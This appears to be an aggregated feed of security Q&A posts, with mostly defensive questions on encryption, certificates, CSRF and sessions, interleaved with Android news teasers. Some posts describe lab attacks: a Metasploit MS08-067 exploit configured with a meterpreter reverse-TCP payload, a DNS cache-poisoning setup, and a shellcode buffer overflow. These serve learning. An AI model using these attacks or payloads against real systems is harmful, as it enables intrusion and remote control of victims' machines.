    Expires: 2016-01-17
     Status: Active
     Cipher: AES-256
     Cipher: AES-192
     Cipher: AES-128
     Cipher: CAST5
     Cipher: TripleDES
       Hash: SHA-256
       Hash: SHA-1
       Hash: SHA-384
       Hash: SHA-512
       Hash: Unknown 0x0B
   Compress: ZLIB
   Compress: BZIP2
   Compress: Zip
      Photo: No
  Revocable: Yes
      Token: No
  Keyserver: Absent
    Default: Yes
    Wrapper: No
 Prop Flags: Sign user IDs
 Prop Flags: Sign messages
 Prop Flags: PGP NetShare
 Prop Flags: PGP WDE
 Prop Flags: PGP ZIP
 Prop Flags: PGP Messaging
 Ksrv Flags: No modify
 Feat Flags: Modification detection
  Notations: None
      Usage: Sign user IDs
      Usage: Sign messages

  Subkey ID: 0xFbbbb5 (0x96bbbb75)
       Type: RSA (v4) subkey pair
       Size: 2048
    Created: 2014-02-26
    Expires: 2019-01-17
     Status: Active
  Revocable: Yes
      Token: No
      X.509: No
 Prop Flags: Encrypt communications
 Prop Flags: Encrypt storage
 Prop Flags: PGP NetShare
 Prop Flags: PGP WDE
 Prop Flags: PGP ZIP
 Prop Flags: PGP Messaging
  Notations: None
      Usage: Encrypt communications
      Usage: Encrypt storage
      Usage: PGP NetShare
      Usage: PGP WDE
      Usage: PGP ZIP
      Usage: PGP Messaging

        ADK: None

    Revoker: None

1 key found

Question

What is a "Joint Key", and should a PGP private key be "joint"

Is there any way I can tell if the ASC is expecting "wrapped" syntax?

How do I import a private key from Aix?

Is it secure to split information into multiple packets?

I just stumbled upon this SO question. I was wondering if it would be still secure to split the encrypted packet into multiple packets, which are then transferred over the wire separately.

Could someone tamper with the MAC or contents of the packet if it was split and sent separately?

Is splitting information into packets a common way to transfer large amounts of data? What security implication does it have?

Email account password change via email-to-script

I host a mail server (postfix and dovecot) and I wish to set up a password change feature (especially useful when creating a new address provided with a temporary password).

Does my scenario has security vulnerabilities?

usage:

from their email address, user send an email with the subject "password" and containing in the body the new password in clear to a special address that run a script.

This script read the new password in the mail content and change the user's password.

context:

Only the addresses of the domains managed by the mail server can send an email to this special address

SMTP and IMAP connection using TLS only

Mail are delivered locally to the domain and do not pass through an intermediate SMTP

After the change password, the script delete the sent email in the mail sent folder of the user account

EDIT:

the SMTP server accept only authenticated user

my script check the value of sasl_username provided by postfix

Best tablet games: 7 to play on your shiny new Android slab!

If you're a new Android tablet owner, there are some games you must try. Here are our essential Android tablet games.

(This is a preview - click here to read the entire entry.)

No HTTPS on Credit Card entry form - Can it be safe?

I was going to make a purchase on a website, but the page containing the Credit Card entry form is HTTP and HTTPS. Is it definitely unsafe?

The website advertise the use of "RapidSSL" but if I send my credit card number through HTTP I don't really get it... Is pressing next on this page a security concern?

no https http://imgur.com/IVmvo3f

The best apps to customize your Android for a truly unique look

Knowing how to customize your Android phone is the best way to stand out from the crowd. Here are the best apps to customize your Android smartphone.

(This is a preview - click here to read the entire entry.)

Protecting against bad USB in ubuntu

I am referring to this thread: How to prevent BadUSB attacks on linux desktop

Since i want to install ubunto onto a possible infected usbDrive using a live DVD and the installation manager i was wondering if the answer of user10008 in the above named thread would be enough protection for me.

Furthermore want to ask: is it really enough to block HID devices? user10008 states in his reply that network devices are no real danger but i am wondering if given the fact that there is an already activated internet connecion on the victim PC the addition of a new network adapter by bad USB could be an attack vector that a possibly nearby living attacker could use to get total controll of the system.

6.4.1 Separate development/test and production environments, what is an acceptable way to deploy to the production environment?

Suppose developers merge php5 source code modules (essentially a set of files in a folder) directly from development machines to the live environment via a samba share (turned on only for the duration of the transfer). The team consists of 3 DevOps that have shared responsibility for server and network administration (i.e. to avoid deployment bottlenecks and have someone to cover when others are on leave). Live web server is on a different network than the development network. The live server is in a secure data centre and the development machines are in a head office. The two networks are connected via VPN. Firefalls restrict samba access to only the development IPs.

Are there any filesystems that have secure deletion as a feature?

What kind of vulnerability it may have for known ssh-hostkey?

I saw there is NSE script in nmap that can retrieve the ssh-hostkey(RSA or DSA) from the target host. For example,


22/tcp open  ssh
|  ssh-hostkey: 2048 f0:58:ce:f4:aa:a4:59:1c:8e:dd:4d:07:44:c8:25:11 (RSA)

Can anyone explain what could happen if we can get ssh-hostkey? Is it a kind of misconfiguration for ssh? Thanks.

does using a long delimiter multiple times degenerate encryption security?

I need to condense multiple distinct pieces of data into a single encrypted string that can be decrypted and separated out later.

Before encrypting, I need to separate the data with some kind of delimiter that will never be confused with the data.

I have chosen to use a single, constant 20 character hexadecimal delimiter. For example:


data_piece
data_item
data_obj

becomes


data_piece214c1a16bb5236e7090cdata_item214c1a16bb5236e7090cdata_obj

which then becomes


vjXC4Xd7LU6aZX4QClZkU330XT39hnoLoQYIFNov39tPX96OKsid7mOBHwoVb4KspyvMpVPrsfHCUd1zbzXyETtgW5yF4b0oaK8Q%2FZCZN2XBvbfL3vooD%2FDLOza3%2FSrSNNzIW8oALZhv08LBzeg3DvgUgC8fg0xv4%2BCAEIQLIhM%3D

after running it through a standard Rijndael encryption algorithm with a 256 bit key and a url encoder.

Does this repetition of a single delimiter degenerate the security of the encryption if there are occasions when it may be used two dozen times? If so, should I use an array of unique delimiters so that they are never repeated within the same string, or does the difference really not matter for practical encryption purposes?

UPDATE:

The reason I chose to use a long delimiter instead of a small one is for cases like this:


delimiter = |
data1 = mydata\\\\
data2 = \|\|\|data

unescaped: mydata\\\\|\|\|\|data

escaped: mydata\\\\\\\\|\\\|\\\|\\\|data

writing code to unescape that and separate it out is not very straightforward. It is possible to do, but there will have to be a loop that continually looks for an end to sequence of escape characters preceding the delimiter, then unescapes it only if the number of escape characters in the sequence is odd.

Since this involves checks before every unescape function, I thought a long delimiter was better, because it can be practically guaranteed to never occur in the data, and allows the separation process to be as simple as possible.

SHORT ANSWER:

Yes. But the encryption (using AES-256) is still strong enough to withstand real world brute force attacks, so the added weakness is negligible.

This long delimiter technique can be improved by using a random delimiter for each string of condensed data.

However, using a long delimiter is not the best technique for any circumstance. A one character delimiter is sufficient and better for both security and memory usage. To mitigate the issue I described above, use the following procedure:


delimiter = |
data1 = mydata\\\\
data2 = \|\|\|data

encode data separately to remove delimiter character altogether
(ex. using php rawurlencode)
mydata%5C%5C
%5C%7C%5C%7C%5C%7Cdata

serialize the data
mydata%5C%5C|%5C%7C%5C%7C%5C%7Cdata

encrypt the serialization
8XcaEW2st4qBZhGB1MbO200eLbhhoOV3V4MCpa9k6ODiN6dcJypTWabq2YsUwBC2tnkKdaUOU7jviilahNQ2B+DRvtLMYDrFNp3qHh0oWMUAuAnjCcKuHfE9tIcd/Jhv

If you reverse that process, it is very straightforward to separate the data and get it back to its original form.

Notice that the final encrypted string is 30% shorter than the one that used the long delimiter.

See lserni's answer for more details and space saving methods.

Why is HTTPS seemingly so infrequently used internationally (Asia)?

I've recently had the privilege of doing some traveling internationally, and I noticed that (particularly in Asia) HTTPS is very infrequently used, even on government and educational websites where users login and provide sensitive information. I did some reading on Wikipedia about the export of encryption technologies from the USA being a potential issue, but I was under the impression that utilities like OpenSSL were pretty much free for use everywhere, and that CA's were able to issue certificates to any countries that weren't considered to be "unstable" or "at odds" with either the UN or USA (not sure of specifics on this one). Knowing how easy it is for an attacker to sniff HTTP traffic on WiFi networks, I was shocked that these institutions weren't protecting their users by implementing HTTPS. And without identity confirmation, there's not even a guarantee that the users are in the right place, whether on WiFi or not.

So, for anyone with any experience in international web security themes, does anyone know why HTTPS isn't being used? Is there something else their users are doing to protect themselves that I'm just totally in the dark about?

How to block foriegn ip addresses on all ports?

I have malware bytes installed on my machine and I keep getting a pop up from it saying that it has blocked this ip address on a port, the problem is that it is always the same ip address and it happens almost every few minutes. How can I make sure that all of my ports are blocked and that there is no way for any inbound connection to connect to me.

MS08_067 with Metasploit

I'm learning how to use Metasploit. I'm using VirtualBox to run a VM with Kali Linux (192.168.56.101) and another with Windows XP SP1 (192.168.56.103). The two VMs can ping each other and Windows Firewall is disabled. I'm running Metasploit on Kali Linux and trying to attack Windows XP SP1.

I fire up msfconsole and start with a port scan:


nmap -sT -A --script=smb-check-vulns -Pn --script-args=unsafe=1 192.168.56.103

which tells me


Host script results:
| smb-check-vulns: 
|   MS08-067: VULNERABLE

I set the parameters this way:


Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.103   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.56.101   yes       The listen address
   LPORT     8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Windows XP SP0/SP1 Universal

Then:


msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.56.101:8080 
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

No active sessions.

What am I doing wrong?

Security of SSL certificates bought via resellers

There are many SSL certificate resellers - some are well known enterprises with good reputation (e.g. domain name registrars) while others are small and unknown companies.

It is clear that resellers don't have access to private keys of certificates purchased via them (unless private key is given to or taken from the reseller; CSR does not contain private key).

But the tricky part is validation procedures done on reissuance (issuance of similar certificate with different private key, during validity period of the the certificate).

My experience shows that at least in some reseller-CA combinations old certificates are not automatically/immediately revoked when doing reissuance. This leads to situation where several certificates (with different private keys) for the same domain name are valid during the same validity period, bought via the same certificate purchase. There are also some legitimate use cases for this (e.g. if multiple servers serving the same site are secured with the "same" certificate and each server has its own private key). Are there CAs that automatically revoke old certificates during reissuance?

My experience shows that at least in some reseller-CA combinations (at least domain level) re-validation is always done during reissuance. Is there any regulations for CAs enforcing re-validation on every reissuance? Is there a risk that malicious reseller could deceive CA and request a certificate reissuance without the re-validation procedure (i.e. can malicious reseller generate his own CSR, give it to CA/RA and get it signed, claiming his customer is doing reissuance)? If yes, are there CAs whose policies require re-validation on every reissuance?

Basically the question is - is it secure to buy SSL certificates from cheap (and unknown) resellers? Or they can abuse the reissuance process (by fooling CAs/RAs to issue fraudulent certificates)?

Is there any security concern to host Wordpress on the main web server?

We have been hosting our Wordpress blog on a Linux virtual box, and our main web application on an IIS server. Our website is www.mainsite.com and the wordpress is on http://www.blog.mainsite.com.

Now there is a requirement that the blog appears as http://www.mainsite.com/blog. I can install PHP, MySQL and Wordpress on our main website IIS server; my question is there are security and performance concerns? Every now and then, a new vulnerability is found in Wordpress and PHP; Is it fine to bring such vulnerable technologies to our main web server? If the admin account if the wordpress blog gets compromised, can this cause any issues for the main web application?

and if it is a bad idea to bring a new stack of technology to our main IIS web server, how can we achieve http://www.mainsite.com/blog instead of current http://www.blog.mainsite.com?

Execute form environmental variable while stack is not executable

Strange thing happened. I created EGG=NOPs + shellcode. Then i get the address of EGG; enter image description here

I made buffer overflow and jumped to it and get the shell(address of shell is the second parametr). How can it happen if i have not executable stack. enter image description here

Your ultimate guide to WhatsApp: tips, tutorials and updates

WhatsApp is one of the most downloaded apps in the world, and we've covered it extensively. Here are all our WhatsApp tips and tricks.

(This is a preview - click here to read the entire entry.)

How to monitor my internet traffic split between a PC and laptop?

I'll try to describe my problem as specific as possible.

So I have an internet connection and there are two PCs using it.

Now let's call my laptop as A and the other PC as B.

Laptop A - My laptop, I pay the bill, I need sufficient speed for my work. (uses wifi ONLY)

Desktop B - A desktop computer, which is used for my work only but the worker uses it for downloading and stuff. I can't monitor the data through my wifi because this desktop is connected via a LAN cable (since desktop doesn't have a wifi, it uses LAN cable).

Now I'm really confused what to do ?

My questions

Is it possible to divide speed in ratio ? Like my laptop gets 70% and his 30%.

Is it possible to block major torrent and other video streaming websites on his desktop? Is it possible to monitor traffic which is going via LAN cable and not Wifi ?

I'm using iBall router.

How to store passwords to a remote web site?

What would be the best way to handle passwords in this scenario?

As an additional level of protection, I'm thinking of running the API as CGI, so that only a short lived process is ever exposed to plaintext credentials.

Does that make any sense? Are there any standard solutions to this kind of problem?

[Edit]

Possible duplicate: How to store passphrase in this situation?

What types of security are used for watermarking applications? [on hold]

One use of "watering" is what I call "branding." That is, you put "watermarks" on your documents to identify them as yours, before sending them out over the "net." These watermarks are usually invisible, but perhaps they need not be, if all they do is to act as your "signature."

The danger of watermarking is "tampering." I can think of two kinds, 1) removal, or 2) altering. What are standard or desirable security measures for these problems?

Cryptographic Puzzle which can give access to a member in DC++

DC++ is a p2p network. In our college network when i try to access a share. He gave the following puzzle.


    YOUR LOVE FOR TREASURE
    WILL TAKE YOU TO "THE TREASURE OF LOVE"
START WITH Blum Blum Shub
    TALK WITH Diffie and Hellman
AND IF NEED BE, Prüfer(Prefer?) Rijndael
    FEED THE Serpent ATLEAST Two fishes
AND THEN THE SHALL THE TREASURE OF LOVE OPEN TO YOU

A FAIR WORD OF CAUTION:
    THE CHINESE ARE GOOD WITH LOTTERY,
    BUT SADLY NOT HERE !!

This is not my field. I don't know what to find and how to.

What account should be used to install SQL Server 2008 patches?

The company I work for is currently going undertaking a project to remediate (among other things) a pen-test finding that a privileged domain-level account (which was compromised by the pen-testers during the audit) was being used for multiple maintenance and development tasks in production. Currently, we're trying to discourage the use of this account and break its functionality out into separate service accounts. We're getting especially firm push-back from the DBA group on the topic of trying to discourage its use in installing SQL Server patches.

So far, I haven't been able to find any guidance specific to accounts when it comes to "best practices" for installing patches so I was wondering if anyone had any first-hand knowledge or a good starting point on where to look. Thanks

Running tails on a corporate computer

is it safe to run tails on a corporate computer? the kind that has hardware cryptography and probably some backdoors? by safe I mean that nobody will be able to recover what I did with tails localy.

Thanks

Preventing CSRF attacks against websocket communications

I have read the thread about CSRF attacks in websockets (Do websocket-powered web apps (e.g. "comet" apps) have to worry about CSRF?) and also some more material regarding websocket security, but none of them seem to address the following issue -

Is it possible for an attacker to cause (by luring the victim to press a link) a legitimate user to open a websocket towards the legitimate service and/or cause the victim to send messages crafted by an attacker within the victim's existing websocket? (similar to a standard CSRF attack in the context of HTTP).

If possible, what can be done to prevent it? Is sending a token in the websocket URL during the websocket opening enough, or does the token need to be sent within each and every one of the requests sent within the websocket?

We are intending to use websockets to implement a chat in the unauthenticated area of our site, and we want to make sure we are doing everything possible to prevent malicious users from executing attacks similar to the one described above. Any special recommendations regarding the most secure way to implement this?

Thanks!

What is the state of the art for forcing logout on browser quit?

Background:

Most browsers have implemented some form of "Session Restore" functionality as a convenience to users where, if enabled, session cookies will be persisted across browser restarts.

Firefox has "Show my windows and tabs from last time"
- https://bugzilla.mozilla.org/show_bug.cgi?id=443354

Chrome has "Continue where you left off"
- https://code.google.com/p/chromium/issues/detail?id=128513

The browser vendors have a defensible position for keeping these features. This puts the onus on users to configure their browsers "correctly" and/or manually log out of the sites before quitting the browser.

Question:

For a site that provides access to highly sensitive data AND is used in shared computing environments, what are the best practices for guaranteeing that a session is destroyed when the browser is closed?

Possible ideas include:

Listening for onbeforeunload events or similar and counting the number of open windows or tabs. When the count goes to 0, send a message to the server to invalidate the session. This seems problematic, due to: a) cross browser event-handling quirks, and b) navigation away from the site, intentional or accidental, would be treated the same as closing the last tab or window.

Implementing a "heartbeat" in the client code that once absent for a period of time invalidates the server session. This also seems challenging due to: a) network latency possibly causing false-positive logouts, and b) some browsers suspending JavaScript code for backgrounded tabs (or applications on mobile).

Are there any other approaches that are reliable across the various web platforms? What are the highest-security websites currently doing in this space?

Sony Xperia Z3 tips: 10 that also work on the Xperia Z3 compact

If you want to get to know the Xperia Z3, here are our Xperia Z3 tips which could also apply to the Xperia Z3 compact! Our ten will help you the feel for your phone.

(This is a preview - click here to read the entire entry.)

SELinux ignoring /etc/sysconfig/selinux directive

I'm running SELinux on CentOS 6.5. In /etc/sysconfig/selinux I have set SELINUX=permissive. But everytime the system starts, sudo getenforce shows SELinux as Enforcing. What could be causing it to go into enforcing mode?

Can SQL Injection lead to RCE? If yes, How?

I don't recall where, but I have read about running some code (Let's say, php code on a php based web application) on the server through SQL injection. Is that possible? If yes, how exactly?

I understand that un-escaped field can lead to SQL Injection and an attacker can execute SQL commands pf his choice directly on the server. But I think of running only SQL commands, not some arbitrary code. Am I wrong here?

PKI - Why Root CA is in intermediate CA section?

I can't understand why, when I accept to "install" a custom self signed Root CA on IE browser, the root certificate ends up in the "intermediate CA" section, rather than in "Root CA" section in the browser certificate container (and in Windows certificate manager too, may be both are the same).

Is it a Microsoft strategy, to only display in Root CA section the trusted CA list ? And not allowing the insertion of a "not known" Root CA in this section ?

When using it, I can't see any difference, but there must be an explanation.

Best Android weather apps and widgets: 12 of the most accurate come rain or shine!

Finding about the weather is probably one of the main reasons we look at our phones: in our article we discuss some of the best Android weather apps and widgets!

(This is a preview - click here to read the entire entry.)

LG G4 price, release date, specs and rumors [update: specs leak reveals 5.3-inch QHD display for the LG G4]

LG's new flagship smartphone, the LG G4, will be upon us in 2015. Find out everything we know so far on the Korean manufacturer's next best device

(This is a preview - click here to read the entire entry.)

Book about security in web applications

I'm new to security in web applications.I have searched in amazon but I was unable to find a book for today's technology. As far as I know HTML5 comes with a few new attack vectors, most of the books didn't include HTML5 vulnerabilities. I'm asking for book that covers most of the things in today technology. I saw a lot of old books(2007-2010) that looked good but they are old now and I'm not sure will I get most of the things I need to know. Probably most of you will say practice well I have complete the challenges in EnigmaGroup and HackThisSite, I have exploited all vulneravilibies in DVWA. However I can't use any tools all exploitations I made were made manually without any help(except a few firefox plugins), so it will be good if the book covers some tools.

Samsung announces super-fast tri-band Galaxy Note 4 LTE-A

Samsung announces super-fast tri-band Galaxy Note 4 LTE-A offering download speeds of up to 300Mbps, increasing to 450Mbps

(This is a preview - click here to read the entire entry.)

What's the use of challenge password in build-key-server and build-key from Easy-RSA?

All the OpenVPN / Easy RSA tutorials that I've found, advise to setting an empty challenge password while building the key for the openvpn server.

Anybody knows why? What's the intended use for the challenge password in Easy RSA server's keys?

And what about client's keys? I see that a build-key-pass esists to generate encrypted client keys, but no server equivalent esists. Still, both build-key and build-key-pass ask for a challenge password.

others using my facebook account

WHY WOULD SOMEONE WANT TO BORROW MY FACEBOOK ACCOUNT? I WAS PLAYING A GAME, AND SOMEONE IN MY GROUP WANTED TO CHAT ON FACEBOOK INSTEAD OF USING THE GAME CHAT, WHICH IS NOT ALL THAT UNCOMMON. AFTER WE BECAME FB FRIENDS, HE SHORTLY ASKED ME IF HE COULD BORROW MY ACCOUNT. I FOUND THAT QUITE ODD, AND OF COURSE I REFUSED. I HAVE NOT KNOWN THIS PERSON VERY LONG. WHAT RISK MAY THIS BE, WHAT MAY BE HIS MOTIVE(S), AND WHAT WOULD YOU SUGGEST I DO?

DNS poisoned cache does not have any effect

I try to reproduce the attack, revealed by Dan Kaminsky in 2008, to poison DNS cache. I made my own virtual network, and all I do is confined within.

The poisonning seems to work. But is doesn't. Why?

The target domain is example.com. Here's my network:


 - Resolver:  200.200.200.1
   Resolves the DNS queries.

 - DNS   #0:  200.200.200.2
   Root DNS Server.

 - DNS   #1:  200.200.200.3
   Authoritative for '.com' zone.

 - DNS   #2:  200.200.200.4
   Authoritative for 'example.com' zone.
   It also runs a web server: www.example.com.

 - Attacker:  200.200.200.5
   The attacker. Tries to perform the attack.
   The attacher is configured to be authoritative for 'example.com' (as DNS2).
   But as he is not referenced by the DNS servers, he won't be asked anything.
   The purpose of the attack is to be stored in the cache of the Resolver.
   Therefore, as long as it's in the cache, any query to <rdm>.example.com will
   be forwarded to him.
   The attacker runs a web server too, and wants to 'steal' www.example.com.

Basically, when someone asks for www.example.com, or whatever, the Resolver asks DNS0, DNS1 and then DNS2. Finally, he stores the interesting records in his cache. It should looks more or less like this:


.                 300   IN   NS   ns.
ns.               300   IN   A    200.200.200.2 (DNS 0)

com.              300   IN   NS   ns.com.
ns.com.           300   IN   A    200.200.200.3 (DNS 1)

example.com.      200   IN   NS   ns.example.com.
ns.example.com.   200   IN   A    200.200.200.4 (DNS 2)

www.example.com.  100   IN   A    200.200.200.4 (DNS 2 runs a web serv)

I made a program to perform the attack. It seems to work. Indeed, here's the cache of the Resolver:


;
; Start view _default
;
;
; Cache dump of view '_default' (cache _default)
;
$ DATE 20141229094639 (09:46:39, 29th of December 2014)
; authanswer
.                    295    IN NS   ns.
; glue
com.                 295    NS      ns.com.
; glue
example.com.         196    NS      ns.example.com.
; glue
ns.example.com.      56     A       200.200.200.5 (Attacker)
; glue
ns.com.              295    A       200.200.200.3 (DNS 1)
; additional
ns.                  295    A       200.200.200.2 (DNS 0)

But in fact, it doesn't work:


 $ dig www.example.com +short
   200.200.200.4 (DNS 2 web serv!)

And here's what the Resolver's cache looks like now:


;
; Start view _default
;
;
; Cache dump of view '_default' (cache _default)
;
$ DATE 20141229094652 (09:46:52, 29th of December 2014)
; authanswer
.                    282    IN NS   ns.
; glue
com.                 282    NS      ns.com.
; authauthority
example.com.         97     NS      ns.example.com.
; answer
ns.example.com.      97     \-AAAA  ;-$NXRRSET
; example.com SOA ns.example.com. admin.example.com. 2014111400 86400 900 1209600 3600
; glue
                     193    A       200.200.200.4 (DNS 2)
; authanswer
www.example.com.     97     A       200.200.200.4 (DNS 2)
; glue
ns.com.              282    A       200.200.200.3 (DNS 1)
; additional
ns.                  282    A       200.200.200.2 (DNS 0)

I don't know what happened. I could see, using wireshark, that when I type dig www.example.com, the Resolver asks DNS2 and not the Attacker. But when I see his cache (the one after a 'successful' attack), he's not supposed to know DNS2.

Does any of you have an idea about what is going wrong?

Thanks, and have a nice day.

Is secondary password (e.g.: pin) necessary?

I find some cases (especially in online games) that a software or website asks users to enter an additional password, such as 4 or 6 digit pin numbers, in addition to their original password. Most of the cases, pin is prompted immediately after users successfully logs in with their username and password.

Is this really necessary?

Does an additional password makes the site or software more secure?

In what scenarios that it is needed to use an additional password?

EDIT:

Thank you for all your answers.

But what I really mean by "pin" is a secret code that has the same usage / behavior as a password.

The "pin" is secret, can be changed by user, and probably hashed & stored in a database the same way like a password does.

Here's one example I encountered in an online game:

When a user enters/runs the game for the first time, the game prompts to enter a "pin" consists of 4 digit numbers. This pin can be changed later.

The pin is always used whenever another time the user logs in, and is prompted after the user enters his/her username and password.

dimanche 28 décembre 2014

Windows Resource Protection

Windows Resource protection Prevents Replacement of Essential System files,Folders,Registry Keys that are installed as part of Operating System This means

I cannot replace,rename,delete essential files in System32 directory,replace Windows folder,replace critical Registry keys Unless I don't Gain TrustedInstaller Privileges and TakeOwnership Privilege, How Windows Malware Gains These Privilages ?, My Guess It first Gains Debugprivilages so that it can tamper with critical processes in system and inject code etc,Is it true Please Enlighten me ? Why does SFC /Scannow command exists does it mean while replacing system files it already has TrustedInstaller Privilage ?

Import certificate into Windows key store

I am using nShield HSM for signing with Ms application/pdf and my own .Net Application. My steps for your information: -Create PKCS11 key pairs -Create a MSCAPI container -Import PKCS11 key into the container Ms application/pdf or .Net application can't find the certificate with a link to corresponding private key (in the container) Can you please help me for this?

Thanks & best regards, Kiet

Will 3rd party antivirus/antimalware programs compromise OSX's built-in security?

There is a very interesting post written by @TechZen. Here's the excerpt from the original post (bold emphasis mine) Should I get an antivirus for my Mac?

There's never been a an actual Mac OS X or iOS virus in the wild that infected any end user's computer. Viruses are malware that can auto replicate without human interaction. All the malware listed in the 10 years of Malware for OSX article are actually trojans. Trojans require that a human being intentionally install the malware and give it permissions to run.

The Mac already comes with Apple's File Quarantine system, which has a trojan blacklist built-in that Apple maintains and updates. Since most trojans now are encrypted, I doubt a 3rd party app will do a better job than the OS.

To use a 3rd party anti-malware program, you have to give that program itself the run of your system and that causes it's own problems and opens its own potential security holes. The tradeoff just isn't worth it in the vast majority of cases.

So the question is, "Will 3rd party antivirus/antimalware programs compromise OSX's built-in security? "

If yes, in what way could it compromise the Mac?

Thanks!

Right security architecture for SQL Server access in a distributed Windows-based system

I am designing a software product for which multiple SQL Server databases will be accessed by multiple applications residing in different Windows environments. Some of the environments are process hosts that run scheduled jobs against the databases. Some of the environments serve as APIs for the data. In all cases, the applications access the databases via an ORM (Entity Framework).

As a software engineer I'm getting better at what I do. But as an infrastructure security engineer I've got a lot to learn. My current thinking is that I want to use Windows authentication only and forget about roles and logins at the database level. Further, I'm thinking to run scheduled jobs using the Local Service account and restrict access to the database servers by endpoint using the firewall. But I'm concerned that if I grant INSERT/UPDATE privilege to any Local Service account and somebody makes a firewall mistake in the future, I might be in big trouble.

Please help me. I'm in over my head. Thanks in advance :-D

TrueCrypt not working on OS X 10.10.1

Can someone help explain why TrueCrypt isn't working on OS X 10.10.1 anymore? I can't get any version to work and it is frustrating. I know TrueCrypt has been discontinued with development but it was working before. Help!

What to do with an old smartphone? 9 ways to reuse it!

So, you got yourself a brand new smartphone. Do you send your old one to the grave or the back or a drawer? Here's some ideas of how you can reuse it.

(This is a preview - click here to read the entire entry.)

How can I test my CAPTCHA's (or CAPTHA-alternative's) effectiveness?

Are there any tools out there to test the effectiveness of user turing tests, such as CAPTCHAs or honeypots, on a site without intentionally getting the site targeted by spambots?

Or do I simply have to implement a solution, deploy to production, and watch the results while hoping for the best?

Which manufacturers who make BadUSB possible on their drives?

So as we all know by know BadUSB is possible on Phison 2251-03 chips. But are there any more reflashable devices in the wild that could be dangerous? And if there are is the firmware easily changed or does it require OEM tools?

I'm asking about this because I have once, when broken my USB stick, stumbled upon a Chinese manufacturer flashing tools and although i couldn't understand how to actually do it I'd guess some people could actually make it work.

In what companies can I find internship/job in information security?

I am a computer science master's student from Europe, majoring in information security and looking for an internship.

The problem is that I have no idea what jobs there are in what kinds of companies in information security.

I am very interested in almost all aspects of information security, but I am most interested in the theoretical parts, such as cryptography and formal methods of information security. Does anybody know of any jobs/companies where one has the opportunity to formally proof properties about a system, model systems to find attacks automatically, analyse/develop new cryptographic protocols or any similar thing? Or does anybody have advice what other jobs there could be in information security if one does prefer to not be programming all day?

I am very thankful for any hint!

My card has been flagged as high risk by online web host company, must provide "material" to override

Recently i changed my credit card since my last one expired. However my hosting company rejects this card because of a "3rd party risk estimator" has flagged it as high-risk, or something like that. In order for me to be able to override this risk estimator and be able to pay for my host, i have to provide some "verification material" which is a picture of the back of my credit card (signed) and my government issued ID on a paper that has "I authorize ******.com to charge this card" written on it, aswell as my signature. This seems awfully fishy to me, and i'm worried that they can use this to take all my money or something, i'm not really familliar with this kind of stuff. I have however been a customer for over 2 years and they haven't done anything like this before, and everything has been working as it should. Is this safe to send? Can they steal all my money if i send this or is this standard procedure when a card has been flagged as high risk? Thank you for your help!